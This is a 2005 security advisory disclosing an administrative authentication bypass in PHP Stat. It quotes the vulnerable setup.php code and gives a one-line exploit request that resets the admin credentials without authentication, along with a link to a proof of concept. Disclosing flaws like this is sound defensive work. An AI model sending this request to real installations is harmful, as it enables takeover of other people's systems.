PHP Stat Administrative User Authentication Bypass
===========================================================
============================================================
Title: PHP Stat
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 25/05/2005
Severity: Medium. PHP Stat Administrative User Authentication Bypass
Affected version: unkown
vendor: http://phpstat.sourceforge.net/journal/
============================================================
============================================================
* Summary *
PhpStat is a set of PHP scripts that can analyze, sort, and generate
statistics on IM
log files from different clients and store the data in a database. It
also allows for
users to read their own logs.
-------------------------------------------------------------
* Problem Description *
The bug reside in $check var in setup.php.
Vulnerable Code
include("config.php");
include("$path_data/setup.php");
$check = $_REQUEST['check'];
$pass = $_REQUEST['pass'];
$user = $_REQUEST['user'];
if ($check == "admin" && $pass == $password && $user == $username) {
showsetup();
} elseif (($check == "admin") && ($pass != $password || $user != $username)) {
adminerror();
} elseif ($check == "yes") {
write($_REQUEST);
} else {
admin();
/*
when it sends a "yes" in setup.php this call to the function "write()"
*/
function write($_REQUEST) {
include("config.php");
.
.
.
.
$admin = strtolower($_REQUEST['admin']);
$username = strtolower($_REQUEST['username']);
$password = strtolower($_REQUEST['password']);
$fp = fopen("$path_data/setup.php", "wb") or die ("The File
\"$path_data/setup.php\" does not exist");
flock( $fp, 2);
fputs ($fp, "<?php\n\$show = \"$show\";\n\$refshow =
\"$refshow\";\n\$ldec = \"$ldec\";\n\$lcolor = \"$lcolor\";\n\$hcolor
= \"$hcolor\";\n\$font_family = \"$font_family\";\n\$font_size =
\"$font_size\";\n\$color = \"$color\";\n\$font_style =
\"$font_style\";\n\$font_weight = \"$font_weight\";\n\$letter_spacing
= \"$letter_spacing\";\n\$admin = \"$admin\";\n\$username =
\"$username\";\n\$password = \"$password\";\n?>");
flock( $fp, 1);
fclose ($fp);
where we you see
setup.php?check=yes&username=admin&password=admin
-------------------------------------------------------------
* POC *
http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt
-------------------------------------------------------------
* Fix *
Use .htaccess or contact Vendor.
-------------------------------------------------------------
* References *
http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt
-------------------------------------------------------------
* Credits *
Vulnerability reported by SoulBlack Security Research
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar